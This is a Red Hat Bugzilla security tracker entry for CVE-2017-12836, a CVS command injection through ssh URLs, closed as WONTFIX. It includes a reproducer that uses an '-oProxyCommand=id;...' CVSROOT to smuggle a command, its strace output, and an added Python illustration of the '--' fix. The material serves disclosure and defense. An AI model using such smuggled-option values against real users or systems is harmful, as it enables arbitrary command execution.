Bug 1480800 (CVE-2017-12836)

Summary: CVE-2017-12836 cvs: Command injection via malicious ssh URLs
Product: [Other] Security Response
Component: vulnerability
Status: CLOSED WONTFIX
Severity: medium
Priority: medium
Version: unspecified
Target Milestone: ---
Target Release: ---
Hardware: All
OS: Linux
Keywords: Security
Reporter: Adam Mariš <amaris>
Assignee: Red Hat Product Security <security-response-team>
CC: ppisar
Last Closed: 2017-08-22 13:35:08 UTC
Bug Depends On: 1480801
Bug Blocks: 1480802, 1485460
Attachments:
  Fix ported to 1.11.23 (flags: none)

Description Adam Mariš 2017-08-11 22:22:01 UTC
Command injection vulnerability was found in CVS that can be triggered via malicious SSH URLs.

References:

http://www.openwall.com/lists/oss-security/2017/08/11/1

Comment 1 Adam Mariš 2017-08-11 22:22:23 UTC
Created cvs tracking bugs for this issue:

Affects: fedora-all [bug 1480801]

Comment 2 Petr Pisar 2017-08-14 08:25:32 UTC
Reproducer:

$ CVS_RSH=/usr/bin/ssh strace -fq -e execve cvs -d '-oProxyCommand=id;localhost:/bar' co yada
execve("/usr/bin/cvs", ["cvs", "-d", "-oProxyCommand=id;localhost:/bar", "co", "yada"], 0x7ffc55abc638 /* 38 vars */) = 0
[pid 22658] execve("/usr/bin/ssh", ["/usr/bin/ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x9ce03e55c0 /* 40 vars */) = 0
Pseudo-terminal will not be allocated because stdin is not a terminal.
[pid 22659] execve("/bin/bash", ["/bin/bash", "-c", "exec id;localhost"], 0x8dbda2340 /* 40 vars */) = 0
[pid 22659] execve("/usr/bin/id", ["id"], 0x26c07faf80 /* 39 vars */) = 0
[pid 22659] +++ exited with 0 +++
[pid 22658] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22659, si_uid=500, si_status=0, si_utime=0, si_stime=1} ---
ssh_exchange_identification: Connection closed by remote host
[pid 22658] +++ exited with 255 +++
[pid 22657] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22658, si_uid=500, si_status=255, si_utime=0, si_stime=1} ---
[pid 22657] +++ exited with 255 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22657, si_uid=500, si_status=255, si_utime=0, si_stime=0} ---
cvs [checkout aborted]: end of file from server (consult above messages if any)
+++ exited with 1 +++

Debian's fix for cvs-1.12.14 <https://bugs.debian.org/cgi-bin/bugreport.cgi?att=1;bug=871810;filename=cvs_1.12.13%2Breal-9%2Bdeb7u1.debdiff;msg=52> adds "--" right before the $CVS_RSH's hostname argument.
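The mechanism behind the reproducer and the effect of the "--" fix, as an added illustration that is not part of this bug report, the cvs source, or the Debian patch: the argv shapes are taken from the strace output above, the hostname `cvs.example.org` is a constructed sample, and `ssh_like_parse` is a toy model of getopt-style option parsing, not ssh's real parser.

```python
# Added example: why a CVSROOT whose host part starts with "-" reaches ssh as
# an option, and why inserting "--" before the host stops that.
MALICIOUS_ROOT = "-oProxyCommand=id;localhost:/bar"  # from the reproducer
BENIGN_ROOT = "cvs.example.org:/bar"                 # constructed sample


def split_root(root):
    """Split 'host:/path' into (host, path) the way an :ext: root is read."""
    host, sep, path = root.partition(":")
    if not sep:
        raise ValueError("CVSROOT must contain host:path")
    return host, path


def rsh_argv_vulnerable(rsh, root):
    """Pre-fix shape: the host is placed directly after the rsh program."""
    host, _ = split_root(root)
    return [rsh, host, "cvs server"]


def rsh_argv_hardened(rsh, root):
    """Post-fix shape: '--' ends option parsing, so a host that begins with
    '-' is taken as the destination rather than as an ssh option."""
    host, _ = split_root(root)
    return [rsh, "--", host, "cvs server"]


def ssh_like_parse(argv):
    """Toy model of getopt-style parsing: words starting with '-' are options
    until a bare '--' or the first positional word; everything after that is
    positional. Returns (options, destination, remote_command)."""
    options, rest = [], []
    args = iter(argv[1:])
    for a in args:
        if rest:
            rest.append(a)
        elif a == "--":
            rest.extend(args)  # drain the iterator: all remaining are positional
        elif a.startswith("-"):
            options.append(a)
        else:
            rest.append(a)
    return options, (rest[0] if rest else None), rest[1:]


def hostname_is_option_like(root):
    """Extra guard for callers whose CVS_RSH program may not honour '--'."""
    return split_root(root)[0].startswith("-")
```

With the vulnerable argv the toy parser reports the ProxyCommand string as an option and "cvs server" as the destination; with "--" in place the same string becomes the destination and no option is set.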

Comment 3 Petr Pisar 2017-08-14 09:07:28 UTC
Created attachment 1313002 [details]
Fix ported to 1.11.23

Comment 4 Stefan Cornelius 2017-08-15 09:21:08 UTC
We've seen similar flaws in other source code management tools. However, the other tools allowed attackers to hide their attack in an elegant way. I'm not aware of such a method for CVS. Thus, in order to exploit this issue, an attacker would likely have to trick a user into executing a suspect command line.

Comment 5 Stefan Cornelius 2017-08-22 13:35:15 UTC
Statement:

Red Hat Product Security has rated this issue as having Moderate security impact. This issue is not currently planned to be addressed in future updates. For additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/.